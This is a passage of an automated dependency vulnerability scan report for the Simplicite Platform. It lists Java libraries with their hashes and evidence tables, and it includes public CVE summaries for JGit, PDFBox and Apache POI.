Version pom version 1.0.2 Highest
org.eclipse.jgit.http.server-5.5.0.201909110433-r.jarDescription:
Git aware HTTP server implementation.
File Path: /var/simplicite/.m2/repository/org/eclipse/jgit/org.eclipse.jgit.http.server/5.5.0.201909110433-r/org.eclipse.jgit.http.server-5.5.0.201909110433-r.jarMD5: ec48075bfa53e1ca3c6975ac4bfd2b0bSHA1: df2a73da47d2b38fc90bd941adda8d2f69d5653bSHA256: 446fbfacb5dcea6c93218ba59a720fe66510a730cc409aac1384282ecb47199bReferenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name org.eclipse.jgit.http.server High Vendor jar package name eclipse Highest Vendor jar package name http Highest Vendor jar package name jgit Highest Vendor jar package name server Highest Vendor Manifest automatic-module-name org.eclipse.jgit.http.server Medium Vendor Manifest build-jdk-spec 1.8 Low Vendor Manifest bundle-activationpolicy lazy Low Vendor Manifest bundle-localization plugin Low Vendor Manifest bundle-requiredexecutionenvironment JavaSE-1.8 Low Vendor Manifest bundle-symbolicname org.eclipse.jgit.http.server Medium Vendor Manifest Implementation-Vendor Eclipse.org - JGit High Vendor Manifest Implementation-Vendor-Id org.eclipse.jgit Medium Vendor Manifest implementation-vendor-url http://www.eclipse.org/jgit/ Medium Vendor pom artifactid eclipse.jgit.http.server Low Vendor pom artifactid org.eclipse.jgit.http.server Highest Vendor pom groupid org.eclipse.jgit Highest Vendor pom name JGit - HTTP Server High Vendor pom parent-artifactid org.eclipse.jgit-parent Low Product file name org.eclipse.jgit.http.server High Product jar package name eclipse Highest Product jar package name http Highest Product jar package name jgit Highest Product jar package name server Highest Product Manifest automatic-module-name org.eclipse.jgit.http.server Medium Product Manifest build-jdk-spec 1.8 Low Product Manifest bundle-activationpolicy lazy Low Product Manifest bundle-localization plugin Low Product Manifest Bundle-Name %Bundle-Name Medium Product Manifest bundle-requiredexecutionenvironment JavaSE-1.8 Low Product Manifest bundle-symbolicname org.eclipse.jgit.http.server Medium Product Manifest Implementation-Title JGit org.eclipse.jgit.http.server High Product pom artifactid eclipse.jgit.http.server Highest Product pom artifactid org.eclipse.jgit.http.server Highest Product pom groupid org.eclipse.jgit Highest Product pom name JGit - HTTP Server High Product pom parent-artifactid org.eclipse.jgit-parent Medium Version Manifest Bundle-Version 5.5.0.201909110433-r High Version Manifest Implementation-Version 5.5.0.201909110433-r High Version pom version 5.5.0.201909110433-r Highest
Related Dependencies org.eclipse.jgit-5.5.0.201909110433-r.jarFile Path: /var/simplicite/.m2/repository/org/eclipse/jgit/org.eclipse.jgit/5.5.0.201909110433-r/org.eclipse.jgit-5.5.0.201909110433-r.jar MD5: 9a063e363be577add8094f325283924e SHA1: 75c27f087134757a8ac335e637c117d68d41c773 SHA256: d5b2cd6284744abbc63ccc10f4c2039a6bc010e9d697c26999f30c4705e5fdcf pkg:maven/org.eclipse.jgit/org.eclipse.jgit@5.5.0.201909110433-r CVE-2023-4759 suppress
Arbitrary File Overwrite in Eclipse JGit <= 6.6.0
In Eclipse JGit, all versions <= 6.6.0.202305301015-r, a symbolic link present in a specially crafted git repository can be used to write a file to locations outside the working tree when this repository is cloned with JGit to a case-insensitive filesystem, or when a checkout from a clone of such a repository is performed on a case-insensitive filesystem.
This can happen on checkout (DirCacheCheckout), merge (ResolveMerger via its WorkingTreeUpdater), pull (PullCommand using merge), and when applying a patch (PatchApplier). This can be exploited for remote code execution (RCE), for instance if the file written outside the working tree is a git filter that gets executed on a subsequent git command.
The issue occurs only on case-insensitive filesystems, like the default filesystems on Windows and macOS. The user performing the clone or checkout must have the rights to create symbolic links for the problem to occur, and symbolic links must be enabled in the git configuration.
Setting git configuration option core.symlinks = false before checking out avoids the problem.
The issue was fixed in Eclipse JGit version 6.6.1.202309021850-r and 6.7.0.202309050840-r, available via Maven Central https://repo1.maven.org/maven2/org/eclipse/jgit/ and repo.eclipse.org https://repo.eclipse.org/content/repositories/jgit-releases/ . A backport is available in 5.13.3 starting from 5.13.3.202401111512-r.
The JGit maintainers would like to thank RyotaK for finding and reporting this issue.
CWE-59 Improper Link Resolution Before File Access ('Link Following'), CWE-178 Improper Handling of Case Sensitivity
CVSSv3:
Base Score: HIGH (8.8) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H References:
Vulnerable Software & Versions: (show all )
org.eclipse.paho.client.mqttv3-1.2.1.jarFile Path: /var/simplicite/.m2/repository/org/eclipse/paho/org.eclipse.paho.client.mqttv3/1.2.1/org.eclipse.paho.client.mqttv3-1.2.1.jarMD5: 94e4b9eac1b077dd6157a71994256f8dSHA1: 0a0932397520960d23566d1d9d09075f28bc8164SHA256: 56e4708abf2e051028f2cd0b206c8d04ec83f272ee30d543a074738269dfeaacReferenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name org.eclipse.paho.client.mqttv3 High Vendor jar package name client Highest Vendor jar package name eclipse Highest Vendor jar package name mqttv3 Highest Vendor jar package name paho Highest Vendor Manifest bundle-activationpolicy lazy Low Vendor Manifest bundle-localization bundle Low Vendor Manifest bundle-requiredexecutionenvironment JavaSE-1.7 Low Vendor Manifest bundle-symbolicname org.eclipse.paho.client.mqttv3 Medium Vendor pom artifactid eclipse.paho.client.mqttv3 Low Vendor pom artifactid org.eclipse.paho.client.mqttv3 Highest Vendor pom groupid org.eclipse.paho Highest Vendor pom parent-artifactid java-parent Low Product file name org.eclipse.paho.client.mqttv3 High Product jar package name client Highest Product jar package name eclipse Highest Product jar package name mqttv3 Highest Product jar package name paho Highest Product Manifest bundle-activationpolicy lazy Low Product Manifest bundle-localization bundle Low Product Manifest Bundle-Name %bundle.name Medium Product Manifest bundle-requiredexecutionenvironment JavaSE-1.7 Low Product Manifest bundle-symbolicname org.eclipse.paho.client.mqttv3 Medium Product pom artifactid eclipse.paho.client.mqttv3 Highest Product pom artifactid org.eclipse.paho.client.mqttv3 Highest Product pom groupid org.eclipse.paho Highest Product pom parent-artifactid java-parent Medium Version file version 1.2.1 High Version Manifest Bundle-Version 1.2.1 High Version pom version 1.2.1 Highest
parso-2.0.11.jarDescription:
Parso is a lightweight Java library designed to read SAS7BDAT datasets. The Parso interfaces
are analogous to libraries designed to read table-storing files, for example, CSVReader library.
Despite its small size, the Parso library is the only full-featured open-source solution to process SAS7BDAT
datasets, both uncompressed, CHAR-compressed and BIN-compressed. It is effective in processing clinical and
statistical data often stored in SAS7BDAT format. Parso allows converting data into CSV format.
License:
Apache License v2: http://www.apache.org/licenses/LICENSE-2.0.html File Path: /var/simplicite/.m2/repository/com/epam/parso/2.0.11/parso-2.0.11.jar
MD5: 5600fb69b3bb3ca4c0270941fa80bf10
SHA1: 3cd3dde9ace470e102bb344e05467ce308108a8e
SHA256: c3042420664fccf8634f77d99bd75e1d2ec03af985e1bf9f1c7a9f4cc79c8fe8
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name parso High Vendor jar package name epam Highest Vendor jar package name epam Low Vendor jar package name impl Low Vendor jar package name parso Highest Vendor jar package name parso Low Vendor pom artifactid parso Highest Vendor pom artifactid parso Low Vendor pom developer email arat90@ya.ru Low Vendor pom developer email Igor_Printsev@epam.com Low Vendor pom developer name Igor Printsev Medium Vendor pom developer name Petr Tsurinov Medium Vendor pom developer org EPAM Medium Vendor pom developer org URL http://www.epam.com Medium Vendor pom groupid com.epam Highest Vendor pom name parso High Vendor pom url epam/parso Highest Product file name parso High Product jar package name epam Highest Product jar package name impl Low Product jar package name parso Highest Product jar package name parso Low Product pom artifactid parso Highest Product pom developer email arat90@ya.ru Low Product pom developer email Igor_Printsev@epam.com Low Product pom developer name Igor Printsev Low Product pom developer name Petr Tsurinov Low Product pom developer org EPAM Low Product pom developer org URL http://www.epam.com Low Product pom groupid com.epam Highest Product pom name parso High Product pom url epam/parso High Version file version 2.0.11 High Version pom version 2.0.11 Highest
pdfbox-2.0.16.jarDescription:
The Apache PDFBox library is an open source Java tool for working with PDF documents.
License:
https://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/org/apache/pdfbox/pdfbox/2.0.16/pdfbox-2.0.16.jar
MD5: 0f1782f92a3c66df7d821ab251f2cb89
SHA1: 5dce5e41fc472d02800df5ef060a1f3a58c36902
SHA256: f53d8e869042296703f6753a6dc48e4823d45b7fc1e9c30bf7d20907f0180068
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name pdfbox High Vendor jar package name apache Highest Vendor jar package name pdfbox Highest Vendor Manifest bundle-docurl http://pdfbox.apache.org Low Vendor Manifest bundle-symbolicname org.apache.pdfbox Medium Vendor Manifest Implementation-Vendor The Apache Software Foundation High Vendor Manifest Implementation-Vendor-Id org.apache.pdfbox Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" Low Vendor Manifest specification-vendor The Apache Software Foundation Low Vendor pom artifactid pdfbox Highest Vendor pom artifactid pdfbox Low Vendor pom groupid org.apache.pdfbox Highest Vendor pom name Apache PDFBox High Vendor pom parent-artifactid pdfbox-parent Low Product file name pdfbox High Product jar package name apache Highest Product jar package name filter Highest Product jar package name pdfbox Highest Product jar package name version Highest Product Manifest bundle-docurl http://pdfbox.apache.org Low Product Manifest Bundle-Name Apache PDFBox Medium Product Manifest bundle-symbolicname org.apache.pdfbox Medium Product Manifest Implementation-Title Apache PDFBox High Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" Low Product Manifest specification-title Apache PDFBox Medium Product pom artifactid pdfbox Highest Product pom groupid org.apache.pdfbox Highest Product pom name Apache PDFBox High Product pom parent-artifactid pdfbox-parent Medium Version file version 2.0.16 High Version Manifest Bundle-Version 2.0.16 High Version Manifest Implementation-Version 2.0.16 High Version pom version 2.0.16 Highest
Related Dependencies pdfbox-debugger-2.0.16.jarFile Path: /var/simplicite/.m2/repository/org/apache/pdfbox/pdfbox-debugger/2.0.16/pdfbox-debugger-2.0.16.jar MD5: a93191c73fcc4d27ef62e94bd095ebad SHA1: c7ce7c9898559bc8a2e1224b08f36d6e3f31e245 SHA256: fa2d359ecce141fb74986f1bfcc91e0fdc8bb36388f4c37aa2f0c60bfe1f889b pkg:maven/org.apache.pdfbox/pdfbox-debugger@2.0.16 pdfbox-tools-2.0.16.jarFile Path: /var/simplicite/.m2/repository/org/apache/pdfbox/pdfbox-tools/2.0.16/pdfbox-tools-2.0.16.jar MD5: ade022f4ede7f37ff82d182c5b9bfaaa SHA1: ef25df47cf8e3776db0ca1007616573e2061295b SHA256: ab192bd897c94e3759603ca1de8d7e82b03552a824b0c02a22af3bc3b83476c8 pkg:maven/org.apache.pdfbox/pdfbox-tools@2.0.16 CVE-2021-27807 suppress
A carefully crafted PDF file can trigger an infinite loop while loading the file. This issue affects Apache PDFBox version 2.0.22 and prior 2.0.x versions. CWE-834 Excessive Iteration
CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:N/A:P CVSSv3:
Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2021-27906 suppress
A carefully crafted PDF file can trigger an OutOfMemory-Exception while loading the file. This issue affects Apache PDFBox version 2.0.22 and prior 2.0.x versions. NVD-CWE-Other
CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:N/A:P CVSSv3:
Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2021-31811 suppress
In Apache PDFBox, a carefully crafted PDF file can trigger an OutOfMemory-Exception while loading the file. This issue affects Apache PDFBox version 2.0.23 and prior 2.0.x versions. CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:N/A:P CVSSv3:
Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2021-31812 suppress
In Apache PDFBox, a carefully crafted PDF file can trigger an infinite loop while loading the file. This issue affects Apache PDFBox version 2.0.23 and prior 2.0.x versions. CWE-835 Loop with Unreachable Exit Condition ('Infinite Loop')
CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:N/A:P CVSSv3:
Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
perfmark-api-0.17.0.jarDescription:
PerfMark API License:
Apache 2.0: https://opensource.org/licenses/Apache-2.0 File Path: /var/simplicite/.m2/repository/io/perfmark/perfmark-api/0.17.0/perfmark-api-0.17.0.jar
MD5: 1c8d1c8e70fd55114f1c31c28da7a813
SHA1: 97e81005e3a7f537366ffdf20e11e050303b58c1
SHA256: 816c11409b8a0c6c9ce1cda14bed526e7b4da0e772da67c5b7b88eefd41520f9
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name perfmark-api High Vendor jar package name io Highest Vendor jar package name io Low Vendor jar package name perfmark Highest Vendor jar package name perfmark Low Vendor pom artifactid perfmark-api Highest Vendor pom artifactid perfmark-api Low Vendor pom developer email carl@carlmastrangelo.com Low Vendor pom developer id carl-mastrangelo Medium Vendor pom developer name Carl Mastrangelo Medium Vendor pom groupid io.perfmark Highest Vendor pom name perfmark:perfmark-api High Vendor pom url perfmark/perfmark Highest Product file name perfmark-api High Product jar package name io Highest Product jar package name perfmark Highest Product jar package name perfmark Low Product pom artifactid perfmark-api Highest Product pom developer email carl@carlmastrangelo.com Low Product pom developer id carl-mastrangelo Low Product pom developer name Carl Mastrangelo Low Product pom groupid io.perfmark Highest Product pom name perfmark:perfmark-api High Product pom url perfmark/perfmark High Version file version 0.17.0 High Version pom version 0.17.0 Highest
poi-4.1.0.jarDescription:
Apache POI - Java API To Access Microsoft Format Files License:
The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/org/apache/poi/poi/4.1.0/poi-4.1.0.jar
MD5: 2d38a6074de57cf93d86e7c5b988c31d
SHA1: 66ea82c8e7cd87e9ae8bceca45daf01328c8d623
SHA256: 0d578177f2bde41aa2b68dbac743186208b7a00ccef3c767d5f3271bed2731bf
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name poi High Vendor jar package name apache Highest Vendor jar package name format Highest Vendor jar package name poi Highest Vendor Manifest Implementation-Vendor The Apache Software Foundation High Vendor Manifest Implementation-Vendor-Id org.apache.poi Medium Vendor Manifest specification-vendor The Apache Software Foundation Low Vendor pom artifactid poi Highest Vendor pom artifactid poi Low Vendor pom groupid org.apache.poi Highest Vendor pom name Apache POI High Vendor pom organization name Apache Software Foundation High Vendor pom organization url http://www.apache.org/ Medium Vendor pom url http://poi.apache.org/ Highest Product file name poi High Product jar package name apache Highest Product jar package name format Highest Product jar package name poi Highest Product Manifest Implementation-Title Apache POI High Product Manifest specification-title Apache POI Medium Product pom artifactid poi Highest Product pom groupid org.apache.poi Highest Product pom name Apache POI High Product pom organization name Apache Software Foundation Low Product pom organization url http://www.apache.org/ Low Product pom url http://poi.apache.org/ Medium Version file version 4.1.0 High Version Manifest Implementation-Version 4.1.0 High Version pom version 4.1.0 Highest
Related Dependencies poi-ooxml-4.1.0.jarFile Path: /var/simplicite/.m2/repository/org/apache/poi/poi-ooxml/4.1.0/poi-ooxml-4.1.0.jar MD5: fd6f7aa27923816712a39ecb8123a86f SHA1: 42d7913de1a6360058e8d14bb7769a33633a639b SHA256: 6efc47195a2af7db6331ef94338d2fab8a405dde7df89a164292935d70f91ec9 pkg:maven/org.apache.poi/poi-ooxml@4.1.0 poi-ooxml-schemas-4.1.0.jarFile Path: /var/simplicite/.m2/repository/org/apache/poi/poi-ooxml-schemas/4.1.0/poi-ooxml-schemas-4.1.0.jar MD5: ebc100eb62204029b5595666bb6cc157 SHA1: 06a2a0dfa19db33f4fba5b0a0261bb517a86cb56 SHA256: f31a38cf88e3c94ed3b6a73fddccac372b8d355163721bdef8c579a81eba002b pkg:maven/org.apache.poi/poi-ooxml-schemas@4.1.0 poi-scratchpad-4.1.0.jarFile Path: /var/simplicite/.m2/repository/org/apache/poi/poi-scratchpad/4.1.0/poi-scratchpad-4.1.0.jar MD5: ff9f0033d89142377ae3af7874890f9e SHA1: a000ba60895a7aede6ebd5bb7f7d8d1c8f9ac735 SHA256: 9b88117286be44a69919a44aac44e6166628e69b742ec806269fbd814b2393e8 pkg:maven/org.apache.poi/poi-scratchpad@4.1.0 CVE-2019-12415 suppress
In Apache POI up to 4.1.0, when using the tool XSSFExportToXml to convert user-provided Microsoft Excel documents, a specially crafted document can allow an attacker to read files from the local filesystem or from internal network resources via XML External Entity (XXE) Processing. CWE-611 Improper Restriction of XML External Entity Reference ('XXE')
CVSSv2:
Base Score: LOW (2.1) Vector: /AV:L/AC:L/Au:N/C:P/I:N/A:N CVSSv3:
Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N References:
Vulnerable Software & Versions: (show all )
CVE-2022-26336 suppress
A shortcoming in the HMEF package of poi-scratchpad (Apache POI) allows an attacker to cause an Out of Memory exception. This package is used to read TNEF files (Microsoft Outlook and Microsoft Exchange Server). If an application uses poi-scratchpad to parse TNEF files and the application allows untrusted users to supply them, then a carefully crafted file can cause an Out of Memory exception. This issue affects poi-scratchpad version 5.2.0 and prior versions. Users are recommended to upgrade to poi-scratchpad 5.2.1. CWE-20 Improper Input Validation, CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:N/A:P CVSSv3:
Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
postgresql-42.6.0.jarDescription:
PostgreSQL JDBC Driver Postgresql License:
BSD-2-Clause: https://jdbc.postgresql.org/about/license.html File Path: /var/simplicite/.m2/repository/org/postgresql/postgresql/42.6.0/postgresql-42.6.0.jar
MD5: 527f2c51d65f6a78d6548c51a35556aa
SHA1: 7614cfce466145b84972781ab0079b8dea49e363
SHA256: b817c67a40c94249fd59d4e686e3327ed0d3d3fae426b20da0f1e75652cfc461
Referenced In Project/Scope: Simplicite Platform:runtime
Evidence Type Source Name Value Confidence Vendor file name postgresql High Vendor jar package name driver Highest Vendor jar package name jdbc Highest Vendor jar package name postgresql Highest Vendor Manifest automatic-module-name org.postgresql.jdbc Medium Vendor Manifest bundle-copyright Copyright (c) 2003-2020, PostgreSQL Global Development Group Low Vendor Manifest bundle-docurl https://jdbc.postgresql.org/ Low Vendor Manifest bundle-symbolicname org.postgresql.jdbc Medium Vendor Manifest Implementation-Vendor PostgreSQL Global Development Group High Vendor Manifest Implementation-Vendor-Id org.postgresql Medium Vendor Manifest provide-capability osgi.service;effective:=active;objectClass="org.osgi.service.jdbc.DataSourceFactory";osgi.jdbc.driver.class="org.postgresql.Driver";osgi.jdbc.driver.name="PostgreSQL JDBC Driver" Low Vendor Manifest require-capability osgi.ee;filter:="(&(|(osgi.ee=J2SE)(osgi.ee=JavaSE))(version>=1.8))" Low Vendor Manifest specification-vendor Oracle Corporation Low Vendor pom artifactid postgresql Highest Vendor pom artifactid postgresql Low Vendor pom developer id bokken Medium Vendor pom developer id davecramer Medium Vendor pom developer id jurka Medium Vendor pom developer id oliver Medium Vendor pom developer id ringerc Medium Vendor pom developer id vlsi Medium Vendor pom developer name Brett Okken Medium Vendor pom developer name Craig Ringer Medium Vendor pom developer name Dave Cramer Medium Vendor pom developer name Kris Jurka Medium Vendor pom developer name Oliver Jowett Medium Vendor pom developer name Vladimir Sitnikov Medium Vendor pom groupid org.postgresql Highest Vendor pom name PostgreSQL JDBC Driver High Vendor pom organization name PostgreSQL Global Development Group High Vendor pom organization url https://jdbc.postgresql.org/ Medium Vendor pom url https://jdbc.postgresql.org Highest Product file name postgresql High Product hint analyzer product pgjdbc Highest Product hint analyzer product postgresql_jdbc_driver Highest Product jar package name driver Highest Product jar package name jdbc Highest Product jar package name osgi Highest Product jar package name postgresql Highest Product jar package name version Highest Product Manifest automatic-module-name org.postgresql.jdbc Medium Product Manifest bundle-copyright Copyright (c) 2003-2020, PostgreSQL Global Development Group Low Product Manifest bundle-docurl https://jdbc.postgresql.org/ Low Product Manifest Bundle-Name PostgreSQL JDBC Driver Medium Product Manifest bundle-symbolicname org.postgresql.jdbc Medium Product Manifest Implementation-Title PostgreSQL JDBC Driver High Product Manifest provide-capability osgi.service;effective:=active;objectClass="org.osgi.service.jdbc.DataSourceFactory";osgi.jdbc.driver.class="org.postgresql.Driver";osgi.jdbc.driver.name="PostgreSQL JDBC Driver" Low Product Manifest require-capability osgi.ee;filter:="(&(|(osgi.ee=J2SE)(osgi.ee=JavaSE))(version>=1.8))" Low Product Manifest specification-title JDBC Medium Product pom artifactid postgresql Highest Product pom developer id bokken Low Product pom developer id davecramer Low Product pom developer id jurka Low Product pom developer id oliver Low Product pom developer id ringerc Low Product pom developer id vlsi Low Product pom developer name Brett Okken Low Product pom developer name Craig Ringer Low Product pom developer name Dave Cramer Low Product pom developer name Kris Jurka Low Product pom developer name Oliver Jowett Low Product pom developer name Vladimir Sitnikov Low Product pom groupid org.postgresql Highest Product pom name PostgreSQL JDBC Driver High Product pom organization name PostgreSQL Global Development Group Low Product pom organization url https://jdbc.postgresql.org/ Low Product pom url https://jdbc.postgresql.org Medium Version file version 42.6.0 High Version Manifest Bundle-Version 42.6.0 High Version Manifest Implementation-Version 42.6.0 High Version pom version 42.6.0 Highest
proto-google-cloud-firestore-admin-v1-1.9.0.jarDescription:
PROTO library for proto-google-cloud-firestore-admin-v1 File Path: /var/simplicite/.m2/repository/com/google/api/grpc/proto-google-cloud-firestore-admin-v1/1.9.0/proto-google-cloud-firestore-admin-v1-1.9.0.jarMD5: b0efde7002174970fc09abb0c4ae19b2SHA1: 0503a6729169653c152a8dc86913bd74f82de7daSHA256: 5d54251efc740f0beb9d7144d18d8b6a2dc7f8052fbbbda50ce917ad9c4b27a1Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name proto-google-cloud-firestore-admin-v1 High Vendor jar package name admin Highest Vendor jar package name admin Low Vendor jar package name firestore Highest Vendor jar package name firestore Low Vendor jar package name google Highest Vendor jar package name google Low Vendor jar package name v1 Highest Vendor pom artifactid proto-google-cloud-firestore-admin-v1 Highest Vendor pom artifactid proto-google-cloud-firestore-admin-v1 Low Vendor pom groupid com.google.api.grpc Highest Vendor pom name proto-google-cloud-firestore-admin-v1 High Vendor pom parent-artifactid google-api-grpc Low Product file name proto-google-cloud-firestore-admin-v1 High Product jar package name admin Highest Product jar package name admin Low Product jar package name firestore Highest Product jar package name firestore Low Product jar package name google Highest Product jar package name v1 Highest Product jar package name v1 Low Product pom artifactid proto-google-cloud-firestore-admin-v1 Highest Product pom groupid com.google.api.grpc Highest Product pom name proto-google-cloud-firestore-admin-v1 High Product pom parent-artifactid google-api-grpc Medium Version file version 1.9.0 High Version pom parent-version 1.9.0 Low Version pom version 1.9.0 Highest
proto-google-cloud-firestore-v1-1.9.0.jarDescription:
PROTO library for proto-google-cloud-firestore-v1 File Path: /var/simplicite/.m2/repository/com/google/api/grpc/proto-google-cloud-firestore-v1/1.9.0/proto-google-cloud-firestore-v1-1.9.0.jarMD5: f8890ed41d3dec67526185af8e9bff7eSHA1: f7010c387aefaf022df0a9550bee4f20229d6aaaSHA256: 8dbc7a5046ad60d38d4d375fe1aa4e27c6a2550fe3c09bf1d3eaf1d2d1d0272dReferenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name proto-google-cloud-firestore-v1 High Vendor jar package name firestore Highest Vendor jar package name firestore Low Vendor jar package name google Highest Vendor jar package name google Low Vendor jar package name v1 Highest Vendor jar package name v1 Low Vendor pom artifactid proto-google-cloud-firestore-v1 Highest Vendor pom artifactid proto-google-cloud-firestore-v1 Low Vendor pom groupid com.google.api.grpc Highest Vendor pom name proto-google-cloud-firestore-v1 High Vendor pom parent-artifactid google-api-grpc Low Product file name proto-google-cloud-firestore-v1 High Product jar package name firestore Highest Product jar package name firestore Low Product jar package name google Highest Product jar package name v1 Highest Product jar package name v1 Low Product pom artifactid proto-google-cloud-firestore-v1 Highest Product pom groupid com.google.api.grpc Highest Product pom name proto-google-cloud-firestore-v1 High Product pom parent-artifactid google-api-grpc Medium Version file version 1.9.0 High Version pom parent-version 1.9.0 Low Version pom version 1.9.0 Highest
proto-google-cloud-firestore-v1beta1-0.62.0.jarDescription:
PROTO library for proto-google-cloud-firestore-v1beta1 File Path: /var/simplicite/.m2/repository/com/google/api/grpc/proto-google-cloud-firestore-v1beta1/0.62.0/proto-google-cloud-firestore-v1beta1-0.62.0.jarMD5: 93266d7f21e7849f00b07743d8546f79SHA1: 632e27a101f7d8f0feae5024b14ac00e7a91698fSHA256: 673fabfb4a0d699b22ad2d92c3de0fe325748ad1602ea2d77dc35e1136a7d2afReferenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name proto-google-cloud-firestore-v1beta1 High Vendor jar package name firestore Highest Vendor jar package name firestore Low Vendor jar package name google Highest Vendor jar package name google Low Vendor jar package name v1beta1 Highest Vendor jar package name v1beta1 Low Vendor pom artifactid proto-google-cloud-firestore-v1beta1 Highest Vendor pom artifactid proto-google-cloud-firestore-v1beta1 Low Vendor pom groupid com.google.api.grpc Highest Vendor pom name proto-google-cloud-firestore-v1beta1 High Vendor pom parent-artifactid google-api-grpc Low Product file name proto-google-cloud-firestore-v1beta1 High Product jar package name firestore Highest Product jar package name firestore Low Product jar package name google Highest Product jar package name v1beta1 Highest Product jar package name v1beta1 Low Product pom artifactid proto-google-cloud-firestore-v1beta1 Highest Product pom groupid com.google.api.grpc Highest Product pom name proto-google-cloud-firestore-v1beta1 High Product pom parent-artifactid google-api-grpc Medium Version file version 0.62.0 High Version pom version 0.62.0 Highest
proto-google-cloud-pubsub-v1-1.73.0.jarDescription:
PROTO library for proto-google-cloud-pubsub-v1 File Path: /var/simplicite/.m2/repository/com/google/api/grpc/proto-google-cloud-pubsub-v1/1.73.0/proto-google-cloud-pubsub-v1-1.73.0.jarMD5: 36c54e399c2fdcdd7c4057832e81bbe1SHA1: 81e98f12b862cb8702a65d9603248b2bbbeb3ef7SHA256: eddd39520e620515b9e62890f4bdd512f75bacc9ec13e3ed58a7d147ec85f06eReferenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name proto-google-cloud-pubsub-v1 High Vendor jar package name google Highest Vendor jar package name google Low Vendor jar package name pubsub Highest Vendor jar package name pubsub Low Vendor jar package name v1 Highest Vendor jar package name v1 Low Vendor pom artifactid proto-google-cloud-pubsub-v1 Highest Vendor pom artifactid proto-google-cloud-pubsub-v1 Low Vendor pom groupid com.google.api.grpc Highest Vendor pom name proto-google-cloud-pubsub-v1 High Vendor pom parent-artifactid google-api-grpc Low Product file name proto-google-cloud-pubsub-v1 High Product jar package name google Highest Product jar package name pubsub Highest Product jar package name pubsub Low Product jar package name v1 Highest Product jar package name v1 Low Product pom artifactid proto-google-cloud-pubsub-v1 Highest Product pom groupid com.google.api.grpc Highest Product pom name proto-google-cloud-pubsub-v1 High Product pom parent-artifactid google-api-grpc Medium Version file version 1.73.0 High Version pom parent-version 1.73.0 Low Version pom version 1.73.0 Highest
proto-google-common-protos-1.16.0.jarDescription:
Google Cloud Common Protos for Java License:
Apache: https://github.com/googleapis/common-protos-java/blob/master/LICENSE File Path: /var/simplicite/.m2/repository/com/google/api/grpc/proto-google-common-protos/1.16.0/proto-google-common-protos-1.16.0.jar
MD5: e60d9ae5f85493ee06f1fe91c884e8c9
SHA1: 2c5f022ea3b8e8df6a619c4cd8faf9af86022daa
SHA256: e6eff21b0a5cc049b0bf2c571fac23abe8dd9d5f9143189f501c04164dc37da2
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name proto-google-common-protos High Vendor jar package name api Highest Vendor jar package name api Low Vendor jar package name cloud Highest Vendor jar package name google Highest Vendor jar package name google Low Vendor pom artifactid proto-google-common-protos Highest Vendor pom artifactid proto-google-common-protos Low Vendor pom developer email googleapis@googlegroups.com Low Vendor pom developer id GoogleAPIs Medium Vendor pom developer name GoogleAPIs Medium Vendor pom developer org Google LLC Medium Vendor pom developer org URL https://www.google.com Medium Vendor pom groupid com.google.api.grpc Highest Vendor pom name Google Cloud Common Protos for Java High Vendor pom url googleapis/common-protos-java Highest Product file name proto-google-common-protos High Product jar package name api Highest Product jar package name api Low Product jar package name cloud Highest Product jar package name google Highest Product pom artifactid proto-google-common-protos Highest Product pom developer email googleapis@googlegroups.com Low Product pom developer id GoogleAPIs Low Product pom developer name GoogleAPIs Low Product pom developer org Google LLC Low Product pom developer org URL https://www.google.com Low Product pom groupid com.google.api.grpc Highest Product pom name Google Cloud Common Protos for Java High Product pom url googleapis/common-protos-java High Version file version 1.16.0 High Version pom version 1.16.0 Highest
proto-google-iam-v1-0.12.0.jarDescription:
PROTO library for proto-google-iam-v1 License:
